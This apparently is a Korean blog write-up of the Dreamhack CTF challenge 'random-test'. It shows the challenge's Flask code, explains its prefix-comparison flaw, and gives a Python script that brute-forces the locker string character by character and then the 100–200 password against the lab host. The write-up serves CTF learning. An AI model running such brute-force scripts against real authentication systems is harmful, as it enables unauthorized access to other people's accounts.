[드림핵(Dreamhack) random-test

728x90

이런식으로 사물함이랑 자물쇠 비번을 맞춰야하는 문제이다

사물함 번호는 알파벳 소문자 혹은 숫자를 포함하는 4자리 랜덤 문자열이고, 비밀번호는 100 이상 200 이하의 랜덤 정수라고 한다

#!/usr/bin/python3
from flask import Flask, request, render_template
import string
import random

app = Flask(__name__)

try:
    FLAG = open("./flag.txt", "r").read()       # flag is here!
except:
    FLAG = "[**FLAG**]"


rand_str = ""
alphanumeric = string.ascii_lowercase + string.digits #소문자 or 숫자
for i in range(4):
    rand_str += str(random.choice(alphanumeric)) #4글자

rand_num = random.randint(100, 200) #100~200


@app.route("/", methods = ["GET", "POST"])
def index():
    if request.method == "GET":
        return render_template("index.html")
    else:
        locker_num = request.form.get("locker_num", "")
        password = request.form.get("password", "")

        if locker_num != "" and rand_str[0:len(locker_num)] == locker_num:
            if locker_num == rand_str and password == str(rand_num):
                return render_template("index.html", result = "FLAG:" + FLAG)
            return render_template("index.html", result = "Good")
        else: 
            return render_template("index.html", result = "Wrong!")
            
            
app.run(host="0.0.0.0", port=8000)

주목해야할 부분은 아래 코드이다

if locker_num != "" and rand_str[0:len(locker_num)] == locker_num:

locker_num만큼만 비교하고 있기 때문에 한 글자 비교, ~, 네 글자 비교 이런식으로 하면 된다

locker_num만 맞으면 Good을 반환하기 때문이다!

처음으로 requests 모듈을 제대로 이용해봤는데 이 문제를 통해 조금 익숙해진 것 같다!

import requests
import string

url="http://host3.dreamhack.games:16258/"

data={"locker_num":"","password":""}
locker_num=['0','0','0','0']
password="100"

#if locker_num != "" and rand_str[0:len(locker_num)] == locker_num:
alpahnumeric=string.ascii_lowercase+string.digits


for i in range(0,4):
    for ch in alpahnumeric:
        locker_num[i]=ch
        data["locker_num"]=''.join(locker_num[:i+1])
        print(data["locker_num"])
        r=requests.post(url=url,data=data)

        if r.text.find("Good")!=-1:
            break
print("Locker_num is",''.join(locker_num))


for i in range(100,201):
    #data["locker_num"]=''.join(locker_num)
    data["locker_num"]='n7pr'
    data["password"]=i
    r=requests.post(url=url,data=data)
    print(i)
    if r.text.find("FLAG")!=-1:
        password=data["password"]
        print("password is",password)
        break

'🔐 Security > Web' 카테고리의 다른 글

[드림핵(Dreamhack)] csrf-advanced (0)	2023.12.27
[드림핵(Dreamhack)] file-download-1 (0)	2023.09.26
[Web] File Vulnerability 실습 (Dreamhack 'image-storage' 문제) (0)	2023.09.26
[드림핵(Dreamhack)] xss-1 (0)	2023.09.22
[BurpSuite] Cluster Bomb Attack (0)	2023.03.06

'🔐 Security > Web' 카테고리의 다른 글

검색 태그

티스토리툴바